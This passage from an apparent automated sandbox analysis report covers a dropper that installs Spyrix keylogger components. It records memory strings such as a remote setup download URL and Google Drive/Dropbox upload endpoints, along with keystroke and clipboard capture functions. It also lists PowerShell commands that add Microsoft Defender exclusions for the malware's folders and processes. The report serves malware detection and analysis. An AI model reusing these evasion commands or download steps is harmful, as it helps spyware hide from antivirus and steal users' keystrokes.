0000001B.00000003.2103090156.000000000346F000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.2103625685.000000000348E000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.2103190131.000000000348D000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.2103523638.0000000003468000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001E.00000002.2105431680.000001FF662F9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001E.00000002.2105518021.000001FF665A0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002C.00000002.2299657776.0000012BE9AE0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002C.00000002.2299431092.0000012BE97F7000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000032.00000002.2534261099.00000000034D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe.
Source: wscript.exe, 00000036.00000002.2553718613.0000000003448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe4
Source: [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe7
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeF
Source: timeout.exe, 0000003D.00000002.2614824930.0000000002E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPD
Source: qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000053.00000002.2775496566.0000000000570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
Source: [space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDL
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046256312.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeQ
Source: reg.exe, 0000001E.00000002.2105431680.000001FF662F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeR
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046124324.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
Source: qrl.exe, 00000045.00000002.2766389640.0000000001798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeY.
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046124324.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046256312.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeg
Source: tasklist.exe, 00000056.00000003.2782882591.000000000318F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exekn
Source: [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exem(ac
Source: qrl.exe, 00000043.00000002.2715156517.00000000017E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exen
Source: regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfkf
Source: regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfkff
Source: spkl.exe, 00000035.00000002.2961326350.00000000033B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfko
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/repository.0
Source: spkl.exe	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=open
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/drive
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/auth/userinfo.prof
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/about
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/drive/v2/files
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/U
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files?maxResults=1000&q=
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/filesU
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files/
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumable
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumableSV
Source: spkl.exe, 00000035.00000002.2933829318.0000000000915000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2555270269.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com
Source: spkl.exe, 00000035.00000002.2933829318.0000000000915000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2555270269.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfk
Source: spkl.exe, 00000035.00000002.2980946676.0000000006C28000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.come

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49751 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6312 OpenClipboard,

53_2_033C6312

Contains functionality to modify clipboard data

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6342 SetClipboardData,

53_2_033C6342

Contains functionality to retrieve information about pressed keystrokes

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6292 GetAsyncKeyState,

53_2_033C6292

Installs a raw input device (often for capturing keystrokes)

Source: spkl.exe, 00000035.00000003.2593935763.0000000007617000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_362380c0-f

System Summary

PE file has nameless sections

Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd

Contains functionality to call native functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C6252 NtdllDefWindowProc_A,

53_2_033C6252

Contains functionality to communicate with device drivers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C5FFA: DeviceIoControl,

53_2_033C5FFA

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_02B3DC34	6_2_02B3DC34
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F6E90	6_2_051F6E90
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F0006	6_2_051F0006
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F0040	6_2_051F0040
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051F6E60	6_2_051F6E60
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051FD937	6_2_051FD937
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_051FD948	6_2_051FD948
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_0A2F2BF8	6_2_0A2F2BF8
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Code function: 6_2_0A2F00C0	6_2_0A2F00C0
